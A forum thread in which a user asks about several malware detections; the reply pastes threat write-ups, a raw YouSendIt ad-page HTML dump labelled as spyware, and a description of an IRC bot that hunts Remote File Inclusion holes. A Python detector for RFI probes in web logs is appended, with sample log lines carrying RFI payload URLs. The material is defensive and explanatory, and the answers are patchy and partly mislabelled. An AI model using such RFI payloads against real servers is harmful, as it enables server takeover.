S3th wrote: Win32.Zafi.B trojan monitors files, networks.
Trojan.Zlob
Spyware.C
Hacktool.D
Dialer.Lox
PackedMassAccess
Spyware.Nod17
Anyone know what these are and how to remove them without any antivirus?
What is Win32.Zafi.B?
Win32/Zafi.B is a worm spreading via e-mail and P2P networks.
Zafi.B worm is a moderately destructive worm that may cause antivirus and security products to stop working. It also may overwrite executables of installed security products. Zafi also disables RegEdit, MSconfig and the Task Manager and may also launch a DoS attack against several Hungarian web sites.
You can search your computer manually yourself.
Trojan.Zlob.B is a Trojan horse that opens a back door and allows a remote attacker to perform various actions on the compromised computer.
Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Distribution
Distribution Level: Low
Spyware.C
sfx.exe content:
<SCRIPT language="javascript" src="
http://lads.yousendit.com/mirror/YSImir ... "></SCRIPT>
<center>
<html> <script src="/__utm.js" type="text/javascript"></script> <head> <meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>YouSendIt: The Leader in File Delivery.</title>
<link href="site.css" rel="STYLESHEET" type="text/css">
<script LANGUAGE="JavaScript">
<!-- Begin
image1 = new Image();
image1.src = "images/b_services1.jpg";
image2 = new Image();
image2.src = "images/b_solutions1.jpg";
image3 = new Image();
image3.src = "images/b_support1.jpg";
image4 = new Image();
image4.src = "images/b_company1.jpg";
// End -->
</script>
<script type="text/javascript">
var randnum = Math.random();
var inum = 11;
// Change this number to the number of images you are using.
var rand1 = Math.round(randnum * (inum-1)) + 1;
images = new Array
images[1] = "images/top1.jpg"
images[2] = "images/top2.jpg"
images[3] = "images/top3.jpg"
images[4] = "images/top4.jpg"
images[5] = "images/top5.jpg"
images[6] = "images/top6.jpg"
images[7] = "images/top7.jpg"
images[8] = "images/top8.jpg"
images[9] = "images/top9.jpg"
images[10] = "images/top10.jpg"
images[11] = "images/top11.jpg"
// Ensure you have an array item for every image you are using.
var image = images[rand1]
</script>
</head>
<BODY bgcolor="#ffffff" id="body1" scroll="yes">
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td rowspan="32" align="top" width="210"><a href="http://www.yousendit.com"><img src="images/ysi_logo_frontpage.jpg" border="0"></a></td>
<td width="518" colspan="2">
<script language="javascript">
<!--
document.write('<img src="'+image+'">')
-->
</script>
</td>
</tr>
<tr>
<td class="smallGrey" align="right">Delivering over 43,973,865,717,760 bytes per day | <strong>What are you sending?</strong></td>
<td><img src="images/dot.gif" width="8" height="8"></td>
</tr>
</table>
</td>
</tr>
<tr><td height="7"></td></tr> <!-- space between "transferring" and blue nav bar -->
</table>
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td width="728" height="19" bgcolor="#3366cc" align="right" class="content"><a class="white" href="community.aspx"> YSI Community </a><a class="white" href="solutions.aspx">| Business Solutions </a><a class="white" href="advertise.aspx">| Advertise </a></td>
</tr>
<tr>
<td colspan="2" height="3"></td> <!-- space between blue nav bar and content of page -->
</tr>
</table>
<span class="content"><font size="-2" align="left">A D V E R T I S E M E N T - Clicking this advertisement will not affect download.</font></span><br>
<iframe src="dart/expired 728x90.aspx" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
<table cellpadding="0" cellspacing="0" width="728" height="300" bgcolor="#ffffff" border="0">
<tr>
<td class="content" align="left" width="167">
<table width="100%" height="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td width="20"></td>
<td width="*" align="left" valign="top">
<a href="howdoesitwork.aspx" class="currentpage"><br><br><br>
<img src="images/arrow_sm.jpg" border="0">How does it work?</a><br>
<a href="whyyousendit.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Why YouSendIt?</a><br>
<a href="abuse.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Report Abuse</a><br>
<a href="community.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Get Involved!</a><br><br>
</td>
<!-- <td width="10" background="images/greenLine10.gif"><img src="images/dot.gif" width="10"></td> -->
</tr>
</table>
</td>
<td class="content" width="561" valign="top"><br>
<table cellpadding="0" cellspacing="0" height="250" border="0">
<tr>
<td width="10" background="images/greenLine10.gif"><img src="images/dot.gif" width="10"></td>
<td width="205" class="content_bigger" valign="top">
<font class="subtitle">Your file has expired.</font><br><br>
Unfortunately, your file has expired. A link is valid
for 7 days or a limited number of downloads, whichever occurs first.<br><br>
Once the link expires, the file is deleted and
cannot be recovered.
</td>
<td width="10"></td>
<td width="336" valign="top">
<center>
<font size="-2">ADVERTISEMENT - Clicking will not affect download.</font><br>
<iframe src="dart/expired 300x250.aspx" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
</center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<span class="content"><font size="-2" align="left">A D V E R T I S E M E N T - Clicking this advertisement will not affect download.</font></span><br>
<!-- Begin BidClix Code -->
<script language="javascript" type="text/javascript">
<!--
document.write('<s'+'cript src="
http://ads.bidclix.com/code/64469/?cb='+
(new Function
("var d=new Date();var u=Date.UTC(d.getUTCFul"
+"lYear(),d.getUTCMonth(),d.getUTCDay(),d.get"
+"UTCHours(),d.getUTCMinutes(),d.getUTCSecond"
+"s(),d.getUTCMilliseconds());return u+'-'+Ma"
+"th.random();"
))()
+'"><'+'/script>');
// -->
</script>
<noscript>
<iframe src="
http://ads.bidclix.com/serve-page/?id=64469" width="740" height="125" scrolling="no" frameBorder="0">
<a href="
http://ads.bidclix.com/serve-link/?id=64469" target="_blank"><img src="
http://ads.bidclix.com/serve-image/?id=64469" width="740" height="125" border="0" alt="" /></a>
</iframe>
</noscript>
<!-- End BidClix Code -->
<table cellpadding="2" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr align="center">
<td colspan="2" align="center">
<hr noshade color="#CCCCCC" size="1">
</td>
</tr>
<tr height="19">
<td class="smallGreen" align="left"><strong>YouSendIt</strong> © 2005</td>
<td width="555" bgcolor="#7FC31C" align="right" class="content"> <a class="white" href="privacy.aspx">Privacy Policy | </a> <a class="white" href="tos.aspx">Terms of Service | </a> <a class="white" href="dmca.aspx">DMCA Policy</a> <a href="company.aspx" class="white"> | Company </a><a href="support.aspx" class="white">| Support </a></td>
</tr>
</table>
<!-- BEGIN DART -->
<script language="Javascript">
<!--
var axel = Math.random() + "";
var ord = axel * 1000000000000000000;
//-->
</script>
<SCRIPT LANGUAGE="JavaScript">
document.write('<SCRIPT LANGUAGE="JavaScript1.1" SRC="
https://ad.doubleclick.net/adj/expired. ... sect=;ord=' + ord + '?" ><\/SCRIPT>');
</SCRIPT>
<SCRIPT>
if ((!document.images && navigator.userAgent.indexOf("Mozilla/2.") >= 0) || navigator.userAgent.indexOf("WebTV")>= 0) {
document.write('<A HREF="
https://ad.doubleclick.net/jump/expired ... sect=;ord=' + ord + '?" TARGET="_blank">');
document.write('<IMG SRC="
https://ad.doubleclick.net/ad/expired.y ... sect=;ord=' + ord + '?" WIDTH="1" HEIGHT="1" BORDER="0" ALT=""></A>');
}
</SCRIPT>
<NOSCRIPT>
<A HREF="
https://ad.doubleclick.net/jump/expired ... =123456789?" TARGET="_blank">
<IMG SRC="
https://ad.doubleclick.net/ad/expired.y ... =123456789?" WIDTH="1" HEIGHT="1" BORDER="0" ALT=""></A>
</NOSCRIPT>
<!-- END DART -->
<iframe src="
http://a.as-us.falkag.net/dat/dlv/aslfr ... =0&mod=111" width="1" height="1" scrolling="no" frameBorder="0"></iframe>
</body>
</html>
Technical details
This malicious program is a hacking utility. It is a Perl script. The size of infected files may vary from 12KB to 69KB.
Payload
This script is an IRC bot which is used to search for Remote File Inclusion (RFI) vulnerabilities.
Depending on the commands received, the bot can:
wipe log files
search for sites with RFI vulnerabilities. In order to find a site, the bot is given a keyword. It then uses the keyword with the following search services:
http://www.google.nl
http://busca.uol.com.br
http://www.alltheweb.com
http://it.ask.com
http://search.aol.com
http://suche.fireball.de
http://search.lycos.com
http://arianna.libero.it
http://search.yahoo.com
http://search.live.com
If sites are found which contain the substrings "buterfly" and "uid=" in the address, the malicious program creates a request which redirects the address to the following link:
http://linknet*****.com/source/cmd.txt?
The contents of this file will then be run on the site's web server. This provides the remote malicious user with access to the server.
The script also contains the following string:
Yogya Ceria Scaner Bot Created By eviL-Zone -= evil =-
Delete the original malicious program file (the location will depend on how the program originally penetrated the victim machine).
Dialer.Lox
An updated TrojanHunter ruleset, containing 27639 ruleset entries, is available. This update adds 5 new trojan definitions:
I hope this gave you the answer to your question. And sorry I couldn't get information on PackedMassAccess.
Spyware.Nod17
Sorry.
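The Hacktool.D write-up quoted in the answer above describes the attack from the bot's side: it finds pages whose address contains "uid=", rewrites that parameter so it points at a remote file such as http://linknet*****.com/source/cmd.txt?, and the vulnerable web server then fetches and executes that file. From the defender's side the same probe leaves a distinctive trace in the web server's access log: a query-string value that is itself an absolute URL, usually ending in "?" so that whatever the application appends (".php", a directory suffix) lands in the query string of the remote fetch rather than in its path. The script below is an added example, not code from the thread or from any vendor write-up; it parses combined-format access log lines, flags parameters whose value is a remote URL (including percent-encoded schemes), and reports which source IPs sent them. The log lines, host names, paths and parameter names in it are constructed for the example.

```python
"""Detect Remote File Inclusion (RFI) probes in combined-format access logs.

Added example; the log lines, hostnames and parameter names are constructed
and are not from the thread above.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value beginning with one of these is a candidate remote include.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample: two RFI probes (one with a percent-encoded scheme)
# and two benign requests.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Mar/2007:04:12:01 +0000] "GET /modules/buterfly/index.php?uid=http://example.invalid/source/cmd.txt? HTTP/1.1" 200 1834 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Mar/2007:04:12:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Mar/2007:04:12:09 +0000] "GET /gallery.php?dir=ftp%3A%2F%2Fexample.invalid%2Fs.txt%3F HTTP/1.1" 500 0 "-" "libwww-perl/5.805"
192.0.2.44 - - [10/Mar/2007:04:13:00 +0000] "GET /view.php?id=42&sort=asc HTTP/1.1" 200 777 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_params(target):
    """Return [(param, value)] for query parameters whose value is an absolute URL.

    parse_qsl percent-decodes values, so "ftp%3A%2F%2F..." is caught as well.
    """
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def matches_bot_filter(url):
    """The selection rule the write-up attributes to the bot: both substrings present."""
    return "buterfly" in url and "uid=" in url


def scan_log(text):
    """Return one finding per (request, suspicious parameter) pair."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        for name, url in rfi_params(rec["target"]):
            findings.append({
                "ip": rec["ip"],
                "path": path,
                "param": name,
                "remote": url,
                "remote_host": urlsplit(url).hostname,
                "status": int(rec["status"]),
                # Trailing "?" pushes any appended suffix into the remote query string.
                "truncates_suffix": url.endswith("?"),
                "bot_filter_match": matches_bot_filter(rec["target"]),
            })
    return findings


def by_source(findings):
    """Count probes per source IP so repeat scanners stand out."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} param={f['param']} "
              f"remote={f['remote_host']} status={f['status']} "
              f"suffix_truncated={f['truncates_suffix']}")
    print("probes per source:", by_source(scan_log(SAMPLE_LOG)))
```

A 200 on such a request does not by itself mean the include succeeded (the application may simply have ignored the parameter), so findings should be checked against outbound connections from the web server to the reported remote host and against any new files written under the web root.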